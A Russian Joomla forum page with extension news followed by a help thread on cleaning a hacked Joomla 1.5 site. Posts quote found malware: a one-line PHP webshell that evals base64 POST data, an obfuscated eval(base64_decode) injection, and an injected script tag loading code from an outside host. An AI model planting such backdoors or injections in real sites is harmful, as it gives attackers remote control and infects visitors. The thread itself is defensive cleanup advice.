Новости Joomla

Обновление модуля WT Quick links v.2.3

Обновление модуля WT Quick links v.2.3

Обновление модуля WT Quick links v.2.3.0Модуль позволяет создавать быстрые наборы элементов: ссылки на различные сущности на сайте Joomla: категории материалов, Virtuemart, JoomShopping, пункт меню или пользовательскую ссылку. Есть условия для исключений показа элементов списка.Вы можете создавать собственные макеты вывода модуля, создавая таким образом почти всё, что угодно: от простого списка ссылок до стены фотографий на главную страницу или ссылки-теги для перелинковки категорий интернет-магазина. Модуль позволяет выводить изображения, адаптивные изображения, видео, адаптивные видео. Также это могут быть не только ссылки, но и список вопросов FAQ, элементы Bootstrap Tabs, Accordion и т.д.v.2.3.0 Что нового?- Собственные макеты для ссылокТеперь для каждой ссылки можно указать собственный макет из папки

/tmpl/sublayout/. Для использования модуля в этом режиме, необходимо выбрать макет модуля -
default-sublayouts или создать собственный вариант этого макета. - Обработка плагинами контентаСодержимое поля Дополнительный текст для ссылки теперь обрабатывается плагинами контента.- Поле примечанияДобавлено поле примечания для ссылки. Это удобно ориентации в большой форме.- Рефакторинг кодаПроведена чистка и улучшения кода.
Страница расширенияGitHub#расширения #virtuemart #JoomShopping

Плагин вставки языковых констант в контент Joomla

Плагин вставки языковых констант в контент Joomla.Плагин позволяет вставлять значения языковых констант в статьи, модули и другой контент Joomla с помощью синтаксиса
{langos LANGUAGE_CONSTANT}.При создании мультиязычного сайта на Joomla вы часто сталкиваетесь с ситуацией:
Нужно изменить всего несколько слов в модуле или статье в зависимости от языка — но приходится создавать отдельные копии контента для каждой языковой версии. Это неудобно и требует лишних усилий.👩‍💻 Решением проблемы становится плагин Langos.Langos позволяет вставлять языковые константы прямо в контент с помощью простого синтаксиса:
{langos YOUR_LANGUAGE_CONSTANT}
Это работает как вызов
\Joomla\CMS\Language\Text::_('YOUR_LANGUAGE_CONSTANT'), но без необходимости программировать или редактировать шаблоны.Кроме того, плагин поддерживает загрузку языковых файлов конкретных расширений, например модулей или компонентов. Для этого просто укажите третий аргумент в шорткоде:
{langos MOD_FOOTER_LINE1, mod_footer}
Теперь плагин загрузит языковую константу из соответствующего языкового файла именно этого расширения.Ключевые особенности плагина🚀 Результаты работы плагина сохраняются в кэше, что положительно влияет на производительность сайта🔁 Совместим с Joomla Cache, JotCache и другими популярными системами кэширования🧩 Вставка языковых констант в любые элементы контента: статьи, модули и т.д.🌐 Полная интеграция с системой мультиязычности Joomla🔌 Работает «из коробки» с любыми стандартными типами контента🛠 Не требует навыков программирования🧪 Подходит для использования визуальными редакторами и не-программистами📦 Поддержка загрузки языковых файлов конкретных расширений🎯 Идеален для динамической замены текста в разных языкахСистемные требованияJoomla >=4.2 | 5.xPHP >= 7.4Разработчик плагина - участник нашего сообщества Артём Васильев (
@kernusr). Скачать плагин с GitHub и документация.#joomla #расширения

0 Пользователей и 1 Гость просматривают эту тему.
  • 29 Ответов
  • 18268 Просмотров
*

Voland70

  • Осваиваюсь на форуме
  • 37
  • 0 / 0
Здравствуйте!
Взломан сайт! Требуется помощь специалистов.

Сайт каталог (ZOO) на Joomla 1.5.
При наборе адреса сайта в  адресной строке браузера, все нормально - попадаю на сайт. По ссылке  найденной в поисковой системе   "Яндекс"  -происходит переадресация  на сайты с рекламой. При этом с компьютеров, на которых  установлен антивирус Касперского,  страница не открывается - блокируется антивирусом.  Выводится следующее:

ДОСТУП ЗАПРЕЩЕН
Запрашиваемый URL-адрес не может быть предоставлен

URL-адрес:

http://netavia.jetos.com/

Заблокирован Веб-Aнтивирусом

Причина: вредоносная ссылка

В целях устранения лечения скачал файлы  сайта  с сервера по FTP и проверил антивирусом.  В результате было найдена 2 файла, - Backdoor.PHP.WedShell.etc  и другой название которого не помню. Удалил указанные файлы, сайт работает,  но проблема не решена. Восстановление  из ранних сохранений  - не помогло.
Так же пробовал переустанавливать Joomla, за одно и обновил, но ситуация этим способом так и не была исправлена.

Провел  сканирование файлов сайта сканером  FLS результаты:
Спойлер
[свернуть]
К сожалению в РНР слаб.  

Что можно сделать в данной ситуации ?
« Последнее редактирование: 20.12.2012, 17:06:20 от Voland70 »
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #1 : 20.12.2012, 19:50:36 »
Цитировать
File: /home/g/gwgroupru/public_html/templates/beez/index.php
String:: _shell_atildi_

это раз
*

Voland70

  • Осваиваюсь на форуме
  • 37
  • 0 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #2 : 20.12.2012, 21:02:11 »
это раз

Благадарю!

В файле index.php - была всего одна строка:index.php.
Это файл шаблона. При том шаблона который не использовался. Удалил, но это не спасло....
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #3 : 20.12.2012, 23:40:28 »
Цитировать
File: /home/g/gwgroupru/public_html/images/post.php
String:: $_POST[

два проверить что там

и смотреть сторонний код в *.js и *.php файлах
htaccess проверить
и чистить сайт
*

Voland70

  • Осваиваюсь на форуме
  • 37
  • 0 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #4 : 21.12.2012, 00:09:57 »
два проверить что там

и смотреть сторонний код в *.js и *.php файлах
htaccess проверить
и чистить сайт
Благадарю за ответ!

В указанном файле  одна строка:
<?php eval(base64_decode($_POST["php"])); ?>

Моих знаний к сожалению не достаточно что бы понять, что в данном файле не так.
.htaccess - вроде бы в порядке, но могу и ошибаться.
Я так понимаю, что во всех указанных при  использовании сканера  FLS файлов и путях к ним содержится вредоносный код. Правильно?
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #5 : 21.12.2012, 05:09:08 »
Моих знаний к сожалению не достаточно что бы понять, что в данном файле не так.
В это файле всё не так. Его нужно удалить. Причём можно практически гарантировать, что он такой "плохой" не единственный.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #6 : 21.12.2012, 09:51:17 »
Цитировать
Я так понимаю, что во всех указанных при  использовании сканера  FLS файлов и путях к ним содержится вредоносный код. Правильно?
нет
те файлы которые сканер показывает надо просто проверить
*

Voland70

  • Осваиваюсь на форуме
  • 37
  • 0 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #7 : 21.12.2012, 12:53:13 »
В это файле всё не так. Его нужно удалить. Причём можно практически гарантировать, что он такой "плохой" не единственный.
Файл удалил, - безрезультатно. Действительно -  файл такой не единственный.

нет
те файлы которые сканер показывает надо просто проверить

Благодарю за ссылку, познавательно.
В статье указанно о том, что ВАЖНО- проверить и поддомены. На хостинге размещен сайт -поддомен, который гораздо популярней основного сайта. С поддомена в поисковиках переадресации не происходит.  Провел сканирование поддомена FLS. Результаты:
Спойлер
[свернуть]

Подскажите пожалуйста на что .htaccess стоит обратить внимание?

*

Voland70

  • Осваиваюсь на форуме
  • 37
  • 0 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #8 : 21.12.2012, 13:05:39 »
В файле, указанном при сканирование FLS
Цитировать
File: /home/g/gwgroupru/public_html/administrator/components/com_sef/models/config.php
String:: $_POST[

в первой строке есть код:

Цитировать
<?php       eval(base64_decode("DQplcnJvcl9yZXBvcnRpb***p9DQp9"));
- Это лишнее?
« Последнее редактирование: 29.01.2013, 16:23:25 от flyingspook »
*

Voland70

  • Осваиваюсь на форуме
  • 37
  • 0 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #9 : 21.12.2012, 13:07:03 »

-стоит удалтить файл целиком, или только строку?
*

SmiP

  • Захожу иногда
  • 264
  • 35 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #10 : 21.12.2012, 13:25:11 »
Ваш base64_decode
Спойлер
[свернуть]

Вот тут обсуждалось
http://joomlaforum.ru/index.php/topic,196376.30.html
У Яндекс-а тоже есть ответ
http://safesearch.ya.ru/replies.xml?item_no=226
*

Voland70

  • Осваиваюсь на форуме
  • 37
  • 0 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #11 : 22.12.2012, 01:16:36 »
Спасибо за ссылки!

Получил полезную информацию, в соответсnвии с которой пытался провести поиск и замену вредоносного кода  на стороне сервера с использованием скрипта replace.php  (http://cmsdev.org/files/cnt.php?file=replace.zip).   Данный способ мне не помог, по итогам вывелось  сообщение о большом количестве найденных файлов в которых содержится вредоносный код   и об ошибке. Из сообщения следовало, что замена не произведена.
Попробовал другой способ:
Скачал с сервера все файлы сайта, провел средствами Total Commander поиск кода:
Спойлер
[свернуть]

В результате Total Commander – было найдено 1022 файла в которых содержится указанный код. В ручную удалять код из такого количества файлов практически не реально. С использованием программы  Notepad++ произвел замену указанного  кода  <?php eval(base64_decode(.........)
на код "<?php ".

Так же удалил указанные  сканером  файлы в одной из папок шаблонов -templates: index.рнр в котором содержалась строка:
Цитировать
_shell_atildi_

И  файл  из папки с изобращениями images/post.php в котором находилась строка:
Цитировать
<?php eval(base64_decode($_POST["php"])); ?>

Залил почищенные файлы обратно на сервер,  но к положительному результату это  не привело.  По прежнему со ссылок на сайт найденных в поисковых системах  идет переадресация. Антивирусы блокируют страницу.

Что ещё можно сделать?
« Последнее редактирование: 29.01.2013, 16:24:00 от flyingspook »
*

Fedor Vlasenko

  • Живу я здесь
  • 3845
  • 733 / 7
  • https://fedor-vlasenko.web.app
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #12 : 22.12.2012, 01:48:06 »
1. Если не хакали Joomla, можно было заменить файлы из оригинального архива.
2. Notepad++ надо было пользоваться используя регулярные выражения "и новые строки" заменять код вируса на пустое значение.
Модификаций кода может быть много.
3. Сайт надо было проверять антивирусами, желательно 2. Но не лечить и не удалять. Только запоминать и контролировать зараженные файлы, которые лечить в с. п. 1-2
*

Voland70

  • Осваиваюсь на форуме
  • 37
  • 0 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #13 : 22.12.2012, 12:00:12 »
Ура! Победа!
Благодарю всех за помощь и полезные советы!

После всех проведенных указанных выше мероприятий по замене содержащегося в файлах сайта вредоносного кода, вновь заменил файлы из оригинального архива Jаoomla- и всё! Проблема решена!
*

Людмила Данчук

  • Новичок
  • 1
  • 0 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #14 : 31.12.2012, 20:11:05 »
как убрать вредоносную ссылку с сайта? помогите!
*

evgen777

  • Давно я тут
  • 657
  • 62 / 2
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #15 : 31.12.2012, 20:29:06 »
Создайте новую тему в этом разделе с подробным описанием проблемы, версией Joomla и ссылкой на сайт.
« Последнее редактирование: 31.12.2012, 20:33:16 от evgen777 »
Разработка, доработка расширений для Joomla!
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #16 : 31.12.2012, 21:10:51 »
как убрать вредоносную ссылку с сайта? помогите!
Скачать шаблон сайта, и искать вставку base64_decode
И сканер в помощь http://joomlaforum.ru/index.php/topic,198048.0.html
*

oleg-great

  • Захожу иногда
  • 50
  • 0 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #17 : 28.01.2013, 23:37:23 »
Сканер fls выдал несколько файлов с подозрением на $_POST[ и confirm(
 Нашел в них такое:
Спойлер
[свернуть]
и так далее в таком роде. Зараженные эти файлы или нет?
Если нет, то что должно быть в зараженном коде после $_POST[ и сonfirm(  ?
*

fonclub

  • Захожу иногда
  • 77
  • 12 / 0
  • joomla developer
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #18 : 29.01.2013, 13:18:09 »
Сканер fls выдал несколько файлов с подозрением на $_POST[ и confirm(
 Нашел в них такое:
***
 и так далее в таком роде. Зараженные эти файлы или нет?
Если нет, то что должно быть в зараженном коде после $_POST[ и сonfirm(  ?

Этот сканер выдает все php файлы в которых находит текст, удовлетворяющий условиям поиска. А в условия поиска как раз и входят переменная $_POST и текст confirm и еще много всяких слов) Только это далеко не значит, что найденный файл, содержащий одно из этих слов заражен. Переменная $_POST так же, как и java функция confirm используются в некоторых вполне нормальных компонентах и для того, чтоб отличить инфицированный файл от неинфицированного нужно понимать хоть немного в php. Тогда вы будете видеть что делает данный файл, в котором нашли якобы плохой код и сможете решить удалять его или нет.
Код файла, который вы написали незаражен. А касаемо того что должно быть в зараженном коде - тут нет однозначного ответа, может быть все что угодно)) Я вот сейчас тоже чищу сайт клиента, так там сразу видно, что сайт заражен..
« Последнее редактирование: 29.01.2013, 16:24:45 от flyingspook »
*

IgorArhangel

  • Захожу иногда
  • 89
  • 0 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #19 : 26.02.2013, 13:17:21 »
Код
<!-- 1bc||stat -->
<script type="text/javascript" src="http://afleks.ru/logs/js.js"></script>
<!-- /1bc||stat -->

Снова заражение. Файл шаблона index.php
Проверил прописался модуль с файлом который взламует конфигурационный файл..
Что сделать что модули не прописывались на сайт?

Я их просто удаляю меняю права на папки и файлы, но снова тоже самое...
Правда пароль еще не менял от фтп)
Смена пароля это значительно?
*

fonclub

  • Захожу иногда
  • 77
  • 12 / 0
  • joomla developer
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #20 : 26.02.2013, 13:19:37 »
Код
<!-- 1bc||stat -->
<script type="text/javascript" src="http://afleks.ru/logs/js.js"></script>
<!-- /1bc||stat -->

Снова заражение. Файл шаблона index.php
Проверил прописался модуль с файлом который взламует конфигурационный файл..
Что сделать что модули не прописывались на сайт?

Я их просто удаляю меняю права на папки и файлы, но снова тоже самое...
Правда пароль еще не менял от фтп)
Смена пароля это значительно?

Смена пароля - это первое, что нужно сделать! Наверняка у них есть ваш пароль и чистить без смены пароля можно до конца жизни.
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #21 : 26.02.2013, 14:22:53 »
Что сделать что модули не прописывались на сайт?

Я их просто удаляю меняю права на папки и файлы, но снова тоже самое...
Правда пароль еще не менял от фтп)
Смена пароля это значительно?
Ищите шелл, бекдор.Найти- удалить, сменить пароли доступа
*

IgorArhangel

  • Захожу иногда
  • 89
  • 0 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #22 : 26.02.2013, 14:32:26 »
Ищите шелл, бекдор.Найти- удалить, сменить пароли доступа

Уже нашел и удалил!

Доступ к ftp поменть? Пароль?
*

Evrokub

  • Новичок
  • 5
  • 0 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #23 : 24.01.2018, 15:49:33 »
является ли данное сообщение антивируса опасным для сайта.

При скачивании файлов сайта evrokub, антивирус заблокировал следующие файлы

http://prntscr.com/i4wj50

Следовательно, что стоит предпринять в данной ситуации?
*

wishlight

  • Гуру
  • 5040
  • 307 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #24 : 24.01.2018, 15:51:00 »
является ли данное сообщение антивируса опасным для сайта.
Да, ваш сайт заражен. Принимайте меры по устранению заражения.
*

Evrokub

  • Новичок
  • 5
  • 0 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #25 : 24.01.2018, 16:09:31 »
Я конечно понимаю, сейчас напишут в Google помощь))

А с чего начать?

И какие конкретно меры предпринять с пострадавшими файлами?

Можно, что-то вроде инструкции. Может есть опытные в этой теме.
*

voland

  • Легенда
  • 11028
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #26 : 24.01.2018, 16:10:31 »
Я конечно понимаю, сейчас напишут в Google помощь))

А с чего начать?

И какие конкретно меры предпринять с пострадавшими файлами?

Можно, что-то вроде инструкции. Может есть опытные в этой теме.
На инструкцию денег не хватит.
Если надо вылечить - в комм раздел, за адекватные уже деньги можно вылечить
*

Evrokub

  • Новичок
  • 5
  • 0 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #27 : 24.01.2018, 16:34:32 »
На инструкцию денег не хватит.
Если надо вылечить - в комм раздел, за адекватные уже деньги можно вылечить

конкретнее можно. Адекватные это сколько.

А то тут форум, о воде видимо забыли дописать.
*

voland

  • Легенда
  • 11028
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #28 : 24.01.2018, 16:53:18 »
конкретнее можно. Адекватные это сколько.

А то тут форум, о воде видимо забыли дописать.
На форуме есть правила - надо вылечить, идите в коммерческий раздел.
Выпрашивая услугу в чужой теме вы сами нарушаете правила и принуждаете нарушать других.
ЗЫ. В подписях (не только моей) есть ссылки на услуги, там всё расписано, надо только кликнуть
*

wishlight

  • Гуру
  • 5040
  • 307 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #29 : 24.01.2018, 17:09:23 »
Лечить можно обновив по возможности расширения и ядро Joomla + проверив их на уязвимости хотя бы по публичным спискам, сменив пароли и проверив сайт в параноидальном режиме скриптом айболит (в таком случае читайте отчет от него) и удалить найденный вредоносный код. Не весь код найденный этим скриптом может быть вредоносным, что-то он может не найти. Необходимо самому иметь некоторые навыки.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 1423
Последний ответ 31.03.2024, 16:14:32
от SeBun
Netflix! - Клиент поймал фишинг на старый сайт. Где порылись собаки?

Автор Alex_gs

Ответов: 9
Просмотров: 1838
Последний ответ 05.11.2021, 21:47:31
от wishlight
Взломали сайт. Как в некоторых случаях делаю я

Автор cntrl

Ответов: 0
Просмотров: 828
Последний ответ 29.08.2020, 00:25:24
от cntrl
Безопасный вход на сайт Joomla и админка

Автор jm

Ответов: 9
Просмотров: 1827
Последний ответ 19.07.2020, 23:57:17
от wishlight
[Руководство] Как защитить сайт на версии 1.5 (не поддерживается разработчиками)

Автор flyingspook

Ответов: 13
Просмотров: 6935
Последний ответ 08.01.2020, 12:52:55
от winstrool